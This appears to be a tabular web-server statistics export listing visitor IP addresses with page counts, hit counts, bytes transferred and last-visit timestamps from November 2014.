78.250.13.162 5 7 179104 20141126162213
130.211.156.244 2 2 16204 20141102110827
61.93.29.10 1 3 11639 20141123042517
99.252.248.42 1 3 11639 20141123140250
178.148.193.16 8 10 400690 20141128073841
65.55.210.63 0 2 3537 
76.10.163.19 1 3 11639 20141115135549
75.120.150.181 2 4 200188 20141114131719
138.37.52.96 2 4 22300 20141103064317
132.160.30.70 3 7 209268 20141106183224
137.50.186.167 4 8 176566 20141104071144
217.216.20.191 5 7 396477 20141125114701
190.31.233.159 6 8 362463 20141105174010
118.163.199.158 1 1 8102 20141106032321
158.125.240.140 6 8 244011 20141126045640
175.44.25.174 3 3 36144 20141103210116
204.126.132.241 2 4 22300 20141119151449
103.14.62.58 4 6 43162 20141105081309
110.159.32.39 1 3 11639 20141126092233
131.253.24.63 1 3 11639 20141120100452
204.134.67.3 1 3 16297 20141118161551
139.194.2.35 8 12 582740 20141129191439
171.221.161.40 1 1 8102 20141109130501
201.239.205.107 1 3 11639 20141129221431
69.58.178.58 9 9 332148 20141109003333
94.12.178.86 3 5 202385 20141122164914
112.156.94.173 3 10 27843 20141120072003
134.117.117.142 7 7 261908 20141121141218
118.211.10.99 2 4 19741 20141111214327
2.177.248.202 9 13 616061 20141116144512
130.211.181.152 1 1 8102 20141121110752
108.171.130.189 1 3 11639 20141124111005
116.49.69.177 12 14 475124 20141117180555
122.167.200.221 11 15 596273 20141110134107
63.252.120.122 4 6 43162 20141124123346
192.133.12.101 6 8 232596 20141118113827
1.23.126.247 3 5 163615 20141108022247
108.5.226.228 10 12 224732 20141111162936
68.108.255.228 4 8 395258 20141112194157
138.163.160.41 1 1 8102 20141119082227
134.193.35.42 1 3 11639 20141118165530
89.145.108.205 1 1 8102 20141120141615
192.83.232.85 3 5 87949 20141125182437
192.12.88.136 2 4 24399 20141112152619
74.242.236.239 2 4 24399 20141110133258
180.153.198.34 1 3 11639 20141107211458
140.254.70.25 5 7 221935 20141105123950
103.14.61.145 4 6 32408 20141121125449
134.161.77.56 3 5 210389 20141110213348
60.242.87.187 4 7 177651 20141123171608
5.9.11.122 2 2 16204 20141129021312
191.32.180.185 1 3 11639 20141115100922
192.86.100.77 3 5 13049 20141107164618
174.65.6.214 3 5 160269 20141124185137
88.67.102.19 3 5 24497 20141108103917
192.99.33.150 4 4 68562 20141115063010
182.186.62.146 2 4 155513 20141124095322
69.76.11.50 2 4 24399 20141107174455
82.82.212.148 4 6 485377 20141119135027
183.171.169.131 6 8 54708 20141124090800
75.109.97.224 2 4 22300 20141116175242
14.139.229.35 4 8 219929 20141103005821
184.186.14.66 11 17 771728 20141114172449
152.132.8.197 2 4 158072 20141114113018
23.22.115.68 2 6 197820 20141109073722
31.185.238.138 4 6 45721 20141123093444
192.200.135.95 2 4 19741 20141106182241
60.53.171.19 1 3 11639 20141121053424
108.95.32.204 20 44 1239545 20141118123827
128.255.122.174 1 3 11639 20141105092129
192.55.208.10 4 8 219929 20141119085822
188.105.131.93 1 3 71745 20141130062815
93.67.24.169 1 3 11639 20141110061353
175.44.6.188 5 5 60240 20141114184539
107.77.80.112 3 5 163615 20141106115458
74.232.92.145 2 4 19741 20141121223059
146.111.225.206 7 9 69567 20141124150430
37.159.136.218 1 3 11639 20141118085517
107.72.162.87 1 3 11639 20141110111550
144.172.211.149 4 6 173029 20141106110007
130.211.153.97 1 1 8102 20141122101254
187.233.44.137 4 6 168371 20141107004323
128.97.244.118 1 3 11639 20141119211755
179.236.77.181 1 3 11639 20141130104326
86.159.88.227 2 4 197629 20141109042422
147.188.61.220 1 3 11639 20141126090539
182.56.66.100 5 7 51264 20141120014552
187.112.43.18 1 3 11639 20141110220454
77.27.49.2 1 3 11639 20141102063747
82.145.223.101 1 3 11639 20141102050433
24.47.171.130 1 3 11639 20141118020049
24.22.101.18 1 3 11639 20141116012326
106.69.4.248 1 3 189527 20141104195840
69.180.161.233 1 3 11639 20141103121020
94.9.211.241 3 5 210389 20141120154050
203.110.235.135 2 6 25837 20141113193404
203.253.5.60 2 4 18954 20141111055521
36.80.19.36 2 4 22300 20141122022452
130.18.204.253 5 9 46869 20141118195656
177.53.3.90 1 3 11639 20141117124611
134.249.50.30 10 10 329044 20141114094941
27.150.229.219 1 1 21521 20141113095157
23.251.90.44 4 8 222028 20141113172829
137.132.3.10 1 3 14198 20141116231117
68.3.211.142 1 3 11639 20141102085954
129.81.23.111 1 3 189527 20141114140201
121.222.1.186 7 11 838005 20141125002956
129.120.2.128 6 8 463700 20141112153119
66.249.84.37 1 1 8102 20141102015752
156.22.9.252 2 5 81123 20141109215658
138.28.97.53 2 4 19741 20141119100437
151.100.75.51 14 18 443938 20141107084655
71.166.180.53 8 14 314873 20141114151402
68.171.98.225 2 2 24808 20141107071257
42.2.52.146 2 4 19741 20141118001708
192.161.49.65 1 1 0 20141130083011
66.30.33.38 2 6 19741 20141124081000
213.6.3.58 3 5 27843 20141112031028
193.201.224.91 1 1 8102 20141115214936
189.221.201.94 1 3 11639 20141103141459
213.169.167.5 1 3 11639 20141121084137
213.205.252.32 3 5 163615 20141120031231
209.147.118.94 0 1 2261 
68.41.97.86 3 5 30402 20141119164556
74.115.70.200 19 23 777262 20141120161234
141.30.146.89 14 16 828126 20141112051137
202.46.50.36 1 1 143874 20141102143657
117.120.18.135 6 12 595446 20141123220351
49.150.80.44 1 3 11639 20141125164254
74.52.245.146 1 1 8102 20141120044957
98.121.111.70 1 3 14198 20141101102204
184.186.6.170 2 4 29057 20141129222448
2.146.110.227 1 3 9378 20141110025700
173.242.166.184 4 8 222028 20141103153540
80.41.162.52 1 3 11639 20141110081137
82.139.114.99 1 3 11639 20141103165925
202.46.52.31 1 1 8102 20141116034409
141.241.57.169 3 7 33939 20141110070814
107.132.169.162 4 6 43162 20141122011548
1.178.94.79 3 3 25618 20141116040021
147.8.202.71 1 3 11639 20141119005026
117.218.252.93 13 15 157429 20141127054800
201.40.151.26 1 3 11639 20141124111237
182.185.239.79 2 4 19741 20141124101735
193.145.234.34 1 3 11639 20141103074334
108.216.80.138 2 4 155513 20141108185254
66.220.156.115 1 1 8102 20141122231223
14.202.40.186 3 5 27843 20141104012424
129.59.115.11 1 3 11639 20141120150931
1.171.7.253 18 22 648789 20141108004355
177.206.178.70 1 3 11639 20141127045111
69.248.75.66 4 8 217370 20141118201939
188.4.191.132 1 3 11639 20141115140218
152.20.238.79 1 3 11639 20141113140743
128.95.218.81 4 6 276498 20141115190822
209.147.144.10 6 10 251651 20141124133242
130.211.146.160 1 1 8102 20141101101410
50.140.159.13 5 9 290236 20141125215542
190.235.1.65 1 3 11639 20141122223847
101.173.213.76 4 6 229811 20141120010300
179.216.98.123 1 3 11639 20141118093411
220.233.125.184 8 14 687274 20141127083614
67.244.25.27 1 3 11639 20141103230241
62.162.187.58 4 6 49364 20141128075815
130.211.173.200 1 1 8102 20141114101324
177.168.79.88 1 3 11639 20141125123317
134.147.53.196 2 4 16395 20141124104119
72.22.175.7 2 4 155513 20141105122032
116.40.220.61 1 3 71745 20141123064033
132.245.228.228 1 1 8102 20141124140013
179.211.31.142 1 3 11639 20141130100549
93.189.191.126 5 7 47918 20141107092426
158.94.110.5 1 3 11639 20141119051231
81.98.64.123 1 3 11639 20141120043730
66.8.186.191 1 3 11639 20141122125232
81.202.246.16 2 4 22300 20141118125852
137.73.105.12 7 9 60251 20141120050145
203.87.61.134 1 3 11639 20141106191936
89.241.71.231 1 3 71745 20141109181525
190.189.138.136 6 8 52149 20141115195315
14.2.25.202 1 3 11639 20141126213949
210.195.56.127 3 5 32501 20141106120118
192.236.60.140 6 10 411462 20141126132504
122.4.100.221 6 6 279625 20141118040833
98.191.81.92 1 3 14198 20141106195403
68.228.42.176 2 4 19741 20141107200506
195.154.185.179 2 2 16204 20141113061120
36.248.167.70 2 2 24096 20141103102152
178.33.53.24 2 2 34281 20141129183826
61.135.190.222 1 1 8102 20141127050210
107.72.164.117 1 1 8102 20141113141556
61.135.190.101 3 3 24306 20141130123226
150.214.75.140 3 5 163615 20141111053406
130.225.1.73 10 14 405527 20141114114639
91.98.180.66 1 3 11639 20141105120250
132.3.61.82 0 1 1276 
2.176.46.20 1 3 11639 20141128135710
149.142.103.136 3 5 341503 20141117171225
130.63.128.206 5 9 59459 20141113151316
154.103.185.104 1 3 11639 20141105130010
129.215.203.73 3 5 32501 20141119070829
125.60.173.3 6 10 207991 20141103110027
212.102.67.67 2 4 19741 20141111062214
160.85.104.70 1 3 71745 20141116095200
106.188.1.211 1 3 11639 20141102024727
67.3.93.246 6 10 290334 20141118184628
177.66.192.221 1 3 11639 20141103083532
129.120.195.12 2 4 19741 20141112163850
96.2.23.9 2 2 18763 20141126015721
131.253.24.59 1 3 71745 20141119212305
182.178.136.19 3 5 160269 20141109093845
177.24.47.163 1 3 11639 20141116122554
76.88.62.214 4 10 45578 20141121194541
220.255.1.145 1 1 8102 20141109215411
140.226.169.98 10 14 469077 20141124164502
119.157.3.177 5 7 322808 20141110123051
112.198.79.11 8 10 649097 20141121203759
177.52.252.237 1 3 11639 20141119205716
69.136.209.55 1 3 11639 20141107115524
160.252.69.9 1 3 11639 20141107010536
194.176.105.135 1 3 11639 20141119050308
97.77.73.202 4 8 48798 20141119102319
112.111.165.50 1 1 8102 20141118141515
74.194.166.133 3 5 208290 20141111210356
130.211.185.32 1 1 8102 20141121101350
178.221.185.110 1 3 11639 20141128173230
116.203.78.43 1 3 11639 20141124155716
139.137.128.37 1 1 143874 20141124163510
99.242.172.231 1 3 11639 20141130230745
220.181.51.75 2 2 24808 20141114092219
124.106.65.70 1 3 71745 20141128230528
101.199.108.120 1 3 11639 20141104090353
158.182.101.103 9 13 503691 20141109224157
175.44.4.36 8 8 96384 20141117204913
206.78.39.2 2 4 33160 20141112113537
220.181.132.216 4 4 32408 20141126080203
123.125.68.149 1 1 68208 20141102031513
223.255.230.42 1 1 8102 20141113211458
94.200.71.131 6 8 362535 20141103022522
202.46.63.161 1 1 8102 20141117230052
160.39.135.213 3 5 205731 20141116204323
130.211.138.217 1 1 8102 20141116101254
151.46.202.91 1 3 11639 20141104103734
196.0.42.54 4 8 99588 20141121053318
71.166.178.243 6 8 232467 20141118154457
150.214.54.200 1 3 11639 20141124062159
151.75.242.147 2 4 19741 20141121142946
38.116.192.98 1 3 11639 20141107140335
142.217.135.142 1 3 11639 20141128224727
66.249.88.145 0 1 2261 
81.131.108.217 1 3 11639 20141124135827
68.188.85.129 3 5 341503 20141118183531
24.52.149.14 4 6 346259 20141121134813
204.16.83.246 4 6 206252 20141130162416
107.72.162.23 1 1 8102 20141104175246
199.30.24.100 0 2 3537 
130.211.146.99 1 1 8102 20141117101253
54.92.254.194 1 1 8102 20141115180800
182.57.224.189 1 3 11639 20141104095423
192.184.48.186 1 1 8102 20141104151853
192.138.82.196 3 6 165876 20141106173217
175.44.5.255 3 3 36144 20141104073001
5.135.127.240 2 2 34281 20141129202904
62.24.252.133 6 6 237663 20141129112932
5.239.7.11 1 1 143874 20141108044000
60.230.190.63 1 3 14198 20141101023626
95.10.218.22 4 6 215145 20141107100156
181.66.157.71 4 4 224940 20141122075937
24.159.177.3 1 3 11639 20141124205626
175.159.189.202 5 7 44047 20141104025048
135.0.34.109 6 10 387423 20141117152555
209.147.118.137 1 2 9378 20141116113041
24.228.120.106 6 8 349462 20141103171857
81.106.30.15 1 3 11639 20141115062011
177.93.158.167 1 3 11639 20141122174238
69.253.55.171 2 4 19741 20141125172544
84.59.46.119 4 8 353142 20141124074606
164.107.249.239 1 3 11639 20141114143039
68.238.243.34 1 3 11639 20141117165800
66.119.41.34 1 1 8102 20141107061817
170.140.104.1 2 4 168932 20141103110645
199.19.145.67 2 4 22300 20141103173319
61.135.190.223 5 5 40510 20141119015744
108.238.17.158 9 11 534197 20141118201931
144.32.235.123 2 4 19741 20141104102959
14.136.239.83 3 5 27843 20141104090711
121.205.240.184 1 1 21521 20141113045507
134.226.168.213 1 3 11639 20141111063329
120.149.132.153 3 3 16204 20141113064046
176.62.245.180 1 3 71745 20141127145812
202.29.241.58 1 1 8102 20141126122314
137.132.250.14 2 4 22300 20141119030333
86.147.126.92 3 5 27843 20141111114124
132.204.243.63 4 6 213046 20141123235709
187.39.25.94 1 3 11639 20141127114030
216.29.207.74 2 4 24399 20141107141304
37.201.227.202 1 3 71745 20141120030537
85.85.92.64 5 7 359019 20141103164715
176.200.203.251 5 7 44047 20141122054905
165.166.122.194 9 11 258214 20141111180053
2.121.133.106 4 6 554811 20141121144217
193.61.184.149 1 1 143874 20141113074333
205.175.116.155 3 5 24569 20141107171629
130.211.146.109 1 1 8102 20141123110751
71.190.187.134 5 9 232689 20141117142555
125.252.72.162 5 7 282041 20141110214548
182.188.143.225 7 9 488203 20141110105124
178.40.157.113 4 6 38504 20141116103909
213.124.113.210 1 3 16297 20141128032805
209.147.118.172 1 2 14036 20141107184458
208.103.0.14 1 1 143874 20141117122522
220.255.1.124 0 1 1276 
129.115.2.180 3 7 45354 20141119183355
199.30.25.32 0 2 3537 
222.127.174.27 10 14 477606 20141121021745
97.94.199.217 2 4 22300 20141112030740
147.156.106.6 1 3 11639 20141110112053
152.20.238.182 5 7 51264 20141113095855
78.62.132.231 1 3 11639 20141120071722
168.187.42.225 6 8 59826 20141113130707
196.2.11.10 1 3 11639 20141104071008
120.28.159.53 5 9 253535 20141114044306
179.159.100.13 1 3 11639 20141120140953
187.54.184.223 1 3 11639 20141116203828
130.211.191.223 1 1 8102 20141123101328
124.180.243.27 1 3 71745 20141128074405
89.80.111.13 3 5 32501 20141102085344
85.10.199.67 2 2 0 20141128120840
31.48.75.179 4 6 270593 20141111121311
176.102.38.73 2 2 0 20141106094018
39.35.172.202 3 5 195591 20141102124840
195.62.222.158 2 4 24399 20141128051830
131.245.214.15 1 1 8102 20141104214542
39.34.89.178 1 1 10661 20141126101218
70.174.172.99 1 3 14198 20141121135201
54.167.171.1 2 6 197820 20141115190737
117.222.212.94 4 6 35945 20141127043458
130.211.185.184 1 1 8102 20141122110716
103.27.8.44 2 6 25837 20141116065150
142.157.38.126 1 3 11639 20141113125111
130.211.173.114 1 1 8102 20141119101329
130.211.184.80 1 1 8102 20141116110808
50.198.120.29 1 3 16297 20141121180809
76.204.6.176 7 13 516757 20141129114754
175.44.6.205 4 4 48192 20141126194237
130.211.183.139 1 1 8102 20141118101252
201.13.94.25 1 3 11639 20141114194340
31.41.219.158 1 1 8102 20141129210938
174.70.104.117 2 4 22300 20141124213508
118.168.254.87 2 5 82108 20141121090124
89.114.240.110 5 9 403360 20141130113147
131.253.38.67 4 4 340 20141130101620
189.244.118.116 2 4 19741 20141116140208
72.51.234.68 1 3 25058 20141129035737
175.44.4.211 2 2 24096 20141106231259
68.207.202.137 1 3 11639 20141119145004
208.58.204.194 1 3 11639 20141115164351
128.248.88.215 4 6 38504 20141106120457
71.231.186.124 2 4 22300 20141126171925
81.5.159.42 2 6 23278 20141110090905
194.81.216.17 2 4 79847 20141104073704
126.255.132.175 7 11 305653 20141112031124
78.162.17.188 1 3 11639 20141125003011
182.178.43.86 2 2 16204 20141104074815
98.195.90.21 2 4 24399 20141116145056
81.111.129.188 6 8 52149 20141112202824
27.147.244.77 1 3 11639 20141124051146
85.85.107.91 1 3 11639 20141108063804
82.45.146.195 1 3 11639 20141114042000
187.14.57.159 1 3 11639 20141104182212
121.221.138.65 3 5 27843 20141119014909
138.162.128.55 3 4 323682 20141104154014
187.122.223.94 1 3 11639 20141128131225
128.250.5.254 2 4 197629 20141118233127
24.34.48.180 3 5 208290 20141109192640
61.15.20.14 3 3 24306 20141105094510
155.41.72.36 11 15 515949 20141123161315
198.177.95.129 7 11 578071 20141105100748
201.148.252.24 1 3 11639 20141116201041
87.10.71.15 1 3 11639 20141121060740
149.150.236.189 3 5 205731 20141118150203
177.23.15.39 1 3 11639 20141130102422
66.6.3.231 8 10 279034 20141130232616
200.165.112.141 1 3 11639 20141107211723
194.81.49.62 1 3 11639 20141117072001
218.252.161.6 1 3 11639 20141108000039
84.194.85.216 3 7 28034 20141116044356
50.17.157.13 2 2 190746 20141115185857
107.161.87.50 2 2 24808 20141107100110
24.17.3.95 5 9 164450 20141103155751
175.44.6.64 10 10 120480 20141115224747
178.15.254.26 1 3 11639 20141113083950
46.229.170.197 3 3 24306 20141116031422
179.253.45.15 1 3 11639 20141115072142
125.212.120.120 3 3 24306 20141117052246
94.216.21.178 3 5 19741 20141101171939
50.138.142.27 2 6 23278 20141114223015
109.77.101.85 1 3 16297 20141110170342
165.118.1.50 2 4 16204 20141112043439
109.96.41.33 5 7 316903 20141111100500
78.150.184.151 1 3 11639 20141117123047
155.98.164.39 3 5 208290 20141120142130
49.195.154.13 1 3 11639 20141119032838
66.249.81.233 1 1 8102 20141105121650
210.87.255.236 20 30 830080 20141106023603
162.129.251.65 4 10 176375 20141105145048
193.164.202.172 1 1 68208 20141111162505
134.240.202.55 7 11 416290 20141105201152
176.40.0.31 1 1 143874 20141113060408
202.67.41.51 9 13 471104 20141130125509
147.162.110.99 6 10 426106 20141111130855
211.26.193.93 4 6 35158 20141126191608
130.211.138.179 1 1 8102 20141124110804
91.115.119.2 8 12 257520 20141129050818
78.111.197.158 1 3 11639 20141121164255
158.102.162.6 8 12 433636 20141103063407
146.200.205.244 2 4 79847 20141122061640
199.58.134.122 1 3 11639 20141114163512
163.152.151.5 1 3 11639 20141107032536
50.178.135.43 2 4 155513 20141123151925
175.200.99.85 0 1 2261 
122.170.103.119 1 3 11639 20141108012215
101.199.112.55 2 6 23278 20141117110330
158.135.134.88 1 1 143874 20141107123002
130.88.170.58 6 10 366000 20141118161816
174.114.3.214 2 4 24399 20141121140400
186.212.163.47 1 3 11639 20141123085949
179.56.174.251 1 3 11639 20141106170012
108.180.220.69 1 3 14198 20141119173951
81.129.104.205 1 3 11639 20141126083049
164.111.99.106 8 12 668219 20141114100121
168.244.164.254 2 4 22300 20141124170911
104.193.9.7 1 1 8102 20141127180943
131.188.245.150 9 15 215693 20141125113202
149.152.34.223 1 3 14198 20141106194530
149.130.194.223 5 9 47584 20141113155957
42.2.53.154 1 3 11639 20141106233558
32.212.201.1 12 14 537610 20141104235153
171.33.196.187 1 3 11639 20141119071328
24.211.185.142 2 4 24859 20141130111613
65.55.210.0 0 1 2261 
68.83.182.189 5 13 232546 20141120214544
68.11.77.226 5 7 281254 20141104171740
75.185.184.172 1 1 8102 20141124205524
120.33.217.115 1 1 12048 20141114004354
76.167.144.84 6 10 286988 20141130201801
66.216.252.231 13 15 817841 20141126142743
95.145.54.124 1 3 11639 20141120145355
24.217.105.238 6 10 366000 20141103005825
199.30.24.75 0 2 3537 
212.64.48.35 2 4 19741 20141110143633
152.13.249.208 5 7 46606 20141130221639
151.62.32.57 1 3 11639 20141101133951
220.255.1.173 1 1 143874 20141108090213
73.19.38.88 5 9 357898 20141108211112
176.24.101.11 2 4 22300 20141117125146
36.228.225.212 1 3 11639 20141119083434
54.197.68.98 1 1 8102 20141122170553
130.211.134.14 1 1 8102 20141120101323
198.7.239.20 13 19 278315 20141106161904
173.254.254.249 2 2 34281 20141113181035
129.67.14.173 12 16 681846 20141125120640
142.83.196.61 3 5 24497 20141125134607
144.32.234.124 1 3 11639 20141105103546
66.249.83.197 2 2 194092 20141123115549
108.171.130.187 11 19 277097 20141121132447
220.181.51.77 3 3 17614 20141114092221
166.137.136.125 3 5 30402 20141113144024
46.196.112.79 1 3 11639 20141120080216
192.99.9.164 1 1 8102 20141126054044
68.55.100.48 3 5 383619 20141127105027
66.90.219.83 1 3 11639 20141122105144
68.0.83.63 1 3 11639 20141110092247
199.212.67.203 1 1 8102 20141122124417
86.136.73.85 6 10 230300 20141116041447
105.224.17.92 1 3 11639 20141117050957
67.21.106.94 1 1 8102 20141110102632
200.17.192.129 1 3 11639 20141110060109
128.230.37.82 3 5 210389 20141113144219
156.110.167.239 6 12 248986 20141118140238
24.114.94.63 6 8 238566 20141125123246
177.96.50.147 1 3 11639 20141129172459
182.188.212.176 4 8 39482 20141109082129
177.179.129.112 1 3 11639 20141115101647
108.70.133.131 1 3 11639 20141116230903
110.20.102.66 2 4 79847 20141119203035
87.236.232.97 1 3 11639 20141119042352
5.67.249.224 3 5 210389 20141109173118
46.198.43.234 1 3 11639 20141101202329
60.242.243.47 1 3 11639 20141121234906
177.40.190.188 3 5 168273 20141120195635
205.74.164.114 6 8 430573 20141106121809
24.87.90.122 1 3 11639 20141113223559
12.239.13.140 1 3 11639 20141121181611
203.127.72.12 11 17 116011 20141114022529
60.250.32.182 2 3 80145 20141121091206
182.180.142.56 1 3 11639 20141126045046
137.110.242.111 3 5 35060 20141113171305
179.177.173.86 1 3 11639 20141116092807
66.203.173.210 2 4 24399 20141113121443
169.244.94.215 1 3 11639 20141104155744
209.147.118.4 1 2 10363 20141110015958
99.46.182.245 1 3 11639 20141105191123
207.181.203.202 6 8 558341 20141108161734
76.164.192.107 2 2 18763 20141117233225
193.201.224.18 1 1 8102 20141120005943
35.16.94.87 1 1 8102 20141120100939
187.172.107.62 2 2 16204 20141112131914
69.76.14.129 8 14 215142 20141130190803
1.178.14.42 4 8 179912 20141113050603
130.88.99.222 2 4 19741 20141116132321
74.39.212.91 2 4 24859 20141113210658
217.211.181.171 1 3 11639 20141102092030
141.0.11.155 1 3 11639 20141102104010
187.112.59.147 1 3 11639 20141128192042
199.15.233.176 1 1 10661 20141104044619
132.235.106.148 3 5 87949 20141112175935
147.162.110.100 1 3 16297 20141122150159
70.193.1.249 1 3 11639 20141116132726
73.50.119.66 4 6 216392 20141121151747
132.234.251.230 4 6 210487 20141106210538
199.30.25.192 0 1 2261 
202.67.40.50 1 3 189527 20141106065511
220.181.51.143 0 1 1276 
141.76.249.180 4 6 41915 20141103095818
203.0.37.37 1 3 11639 20141106225420
193.201.224.74 1 1 8102 20141116052754
197.155.231.86 5 9 403360 20141104091607
68.207.148.129 4 6 46090 20141115222916
125.212.120.54 3 3 337966 20141106220714
152.132.10.71 3 9 210389 20141104190814
92.232.15.249 1 5 11639 20141112110154
147.188.254.182 2 4 24399 20141127040358
200.137.163.10 6 8 110221 20141114133008
138.162.140.54 1 1 8102 20141103172726
98.253.16.91 6 8 470590 20141123202012
216.1.111.2 4 6 47108 20141111171230
5.23.122.115 12 20 601379 20141112075028
190.66.66.34 1 3 71745 20141102124643
190.213.73.72 3 5 163615 20141101181117
79.20.77.224 1 3 11639 20141112152955
151.233.221.182 1 3 25058 20141103090349
199.47.81.11 4 4 210296 20141113040945
98.240.116.106 5 9 400014 20141108020938
177.135.19.23 1 3 11639 20141129190231
211.79.189.75 2 4 19741 20141106215816
174.134.220.183 2 4 155513 20141124185111
77.180.51.7 2 4 16395 20141123073808
134.96.63.37 4 6 213046 20141107063944
148.100.181.50 5 9 282232 20141119180549
160.80.208.201 14 32 1066635 20141127093006
82.71.44.103 1 3 11639 20141129100915
100.4.98.157 1 3 14198 20141117164317
86.2.171.190 1 3 25058 20141124051523
190.219.14.20 1 3 11639 20141120094458
190.150.133.194 1 3 11639 20141109120632
92.63.88.42 1 1 8102 20141109183848
62.210.222.111 6 6 129126 20141106024618
27.150.231.200 2 2 43042 20141113212546
49.144.56.235 2 6 23278 20141123083914
202.40.139.164 1 3 11639 20141119225815
154.58.66.133 10 14 564082 20141114083437
12.174.140.114 3 5 202385 20141117113318
109.100.194.43 2 6 23278 20141110120431
39.41.131.113 3 5 30402 20141106080751
50.118.162.85 1 3 11639 20141130051513
62.210.113.241 2 2 34281 20141114112535
86.109.32.72 7 9 237424 20141111024346
112.208.58.64 1 3 11639 20141129025718
128.146.8.181 1 3 11639 20141112102145
198.148.27.26 1 1 8102 20141104080634
162.210.196.163 2 6 23278 20141111161455
91.194.221.225 4 8 353142 20141119052610
27.32.99.245 1 3 11639 20141123211155
61.135.190.104 4 4 32408 20141116054541
38.118.83.250 1 3 11639 20141113093139
122.176.111.232 1 3 11639 20141122041556
130.211.189.134 1 1 8102 20141119111244
70.52.81.253 2 4 16395 20141123233009
79.43.225.135 1 3 11639 20141108224102
104.56.148.126 2 4 19741 20141114180730
130.193.230.162 1 3 11639 20141115092408
149.171.104.111 2 4 19741 20141113181542
195.113.105.62 9 13 414888 20141127062705
98.167.44.47 7 13 186822 20141120030858
223.225.203.139 1 3 11639 20141102125636
58.5.157.20 2 6 23278 20141108105042
175.159.16.230 1 3 11639 20141116222458
24.101.211.251 4 8 102147 20141129192832
160.85.138.42 1 1 8102 20141129094318
177.194.100.74 1 3 11639 20141129180802
198.54.109.151 4 6 38504 20141124014104
223.225.246.55 6 6 47479 20141110044011
192.58.74.40 7 13 265137 20141118061848
54.87.17.56 1 1 8102 20141101211450
66.249.93.155 1 1 10661 20141105121743
64.134.100.88 1 3 11639 20141105162700
179.209.25.57 1 3 11639 20141111161931
164.2.255.244 0 1 0 
36.250.176.210 1 1 21521 20141124120758
181.46.248.199 3 5 32501 20141103081108
131.211.73.48 2 4 19741 20141120085619
96.228.21.126 2 6 143490 20141106031517
75.168.58.127 6 10 371905 20141110232923
83.20.159.63 1 3 11639 20141109031632
66.249.88.143 1 2 9378 20141126120859
92.81.57.245 1 3 11639 20141107115322
175.136.248.222 1 1 170 20141124024545
151.100.74.28 1 3 11639 20141127071958
186.249.123.199 1 3 11639 20141103124925
152.130.6.130 3 9 32501 20141120134209
192.100.69.170 1 1 12760 20141105005415
138.162.128.54 1 2 69484 20141104154008
130.211.134.155 2 2 16204 20141118110756
162.199.165.254 2 4 22300 20141109175459
88.80.186.116 1 1 8102 20141113015851
93.170.186.71 2 2 16204 20141107220925
175.44.7.8 2 2 24096 20141104053003
187.2.53.68 1 3 11639 20141102083051
133.5.18.220 8 12 613506 20141112050816
98.202.130.70 1 1 8102 20141108031129
138.246.2.126 7 11 446158 20141127100347
72.237.206.248 1 1 8102 20141130162029
2.101.170.38 1 3 11639 20141105135107
138.16.128.0 1 3 11639 20141102183155
117.249.246.28 2 4 197629 20141106103220
1.2.154.7 10 12 403335 20141103073518
71.166.178.142 2 4 19741 20141110143946
130.211.143.114 1 1 8102 20141110110851
128.199.62.31 4 8 49555 20141108044336
24.162.248.14 9 16 586129 20141110123016
71.60.49.248 6 8 286797 20141124180753
78.133.64.145 4 6 35945 20141124143150
142.83.196.46 2 4 22300 20141118161830
50.164.41.187 1 3 11639 20141103211713
120.28.125.166 1 3 11639 20141111102434
74.71.210.13 1 3 14198 20141114183502
2.176.26.163 1 1 12760 20141128140704
65.219.44.120 2 4 155513 20141110201539
177.40.242.147 1 3 11639 20141103094348
134.226.168.209 1 3 11639 20141111104048
50.63.196.142 1 1 0 20141116063503
54.80.74.234 1 3 11639 20141122171246
216.106.16.179 1 3 189527 20141118170154
68.60.1.98 5 7 100807 20141111162220
82.132.244.20 1 2 9378 20141122041717
220.255.1.135 0 1 2261 
158.111.4.54 1 3 11639 20141117140145
131.253.24.35 1 3 71745 20141126031157
130.18.154.252 3 5 30402 20141111095122
130.102.158.25 1 3 11639 20141119233840
181.168.204.26 5 7 278695 20141127082717
202.186.7.63 1 1 170 20141115055254
130.132.173.34 5 7 338801 20141120141319
223.225.205.11 6 8 77903 20141110021249
223.64.62.248 2 2 12858 20141130214154
76.91.107.105 1 3 11639 20141119220730
101.188.14.4 3 5 210389 20141123000422
96.61.24.133 1 3 71745 20141118205921
129.112.109.40 1 3 11639 20141113105808
192.3.60.181 2 2 34281 20141117092404
27.159.217.88 1 1 21521 20141125024441
130.211.187.219 1 1 8102 20141127101436
66.222.86.190 16 18 1070464 20141129183609
131.253.24.41 1 3 71745 20141122110009
198.21.248.112 2 4 19741 20141105165834
89.13.164.161 3 5 202385 20141107130905
117.221.231.52 1 3 11639 20141111041753
93.42.225.227 2 4 22300 20141120010500
65.96.132.214 9 13 254606 20141127111927
67.233.65.186 8 12 508408 20141130001735
37.146.36.4 1 3 14198 20141104035722
128.187.177.208 2 4 155513 20141112212443
204.62.150.2 4 6 43162 20141111111717
194.219.246.38 1 3 11639 20141108160247
39.47.70.53 6 8 291455 20141111154558
5.12.158.51 3 5 32501 20141129092416
24.126.66.5 7 11 436767 20141110103503
129.240.37.75 2 4 139953 20141111051707
50.25.241.245 2 4 22300 20141129233035
130.85.58.230 4 6 273939 20141109170330
81.174.56.44 1 3 11639 20141103045808
124.27.55.57 1 3 11639 20141109201706
23.95.92.142 2 2 20862 20141110062552
129.186.252.128 1 3 11639 20141104185837
199.30.25.119 0 1 2261 
76.67.177.89 1 3 11639 20141128115319
132.183.13.5 2 4 155513 20141124084344
96.22.95.38 5 7 43332 20141125162258
62.98.121.186 2 4 16395 20141112055108
5.151.2.31 4 6 38504 20141120222339
109.162.140.73 3 5 160269 20141122144950
31.205.75.40 3 5 205731 20141104120245
130.211.137.155 1 1 8102 20141110101245
175.44.5.240 2 2 24096 20141104005458
115.64.236.215 3 5 202385 20141117223917
147.188.254.151 18 20 159609 20141111134414
64.213.222.27 1 1 8102 20141122171247
137.92.25.54 1 3 16297 20141119175853
66.213.50.2 1 3 11639 20141124190156
80.13.53.211 4 6 213046 20141127102947
203.217.150.76 1 3 11639 20141119182455
68.118.118.226 1 3 11639 20141111131239
187.41.141.204 13 17 663332 20141111122610
129.120.2.135 2 2 18763 20141112152320
179.182.96.26 1 3 11639 20141108033745
194.176.105.154 4 6 216392 20141106111626
202.46.56.129 1 1 8102 20141118210431
179.216.136.239 1 3 11639 20141127132118
209.124.174.38 3 7 209268 20141112140613
70.188.123.9 12 16 477364 20141113223430
2.28.31.28 1 1 8102 20141114161034
175.44.4.12 2 2 24096 20141106192113
155.133.19.35 3 3 24306 20141120155215
188.26.57.51 1 3 11639 20141108123141
74.70.175.90 1 3 11639 20141114121652
92.119.174.15 2 6 201166 20141103061257
131.111.93.201 5 9 405919 20141125075944
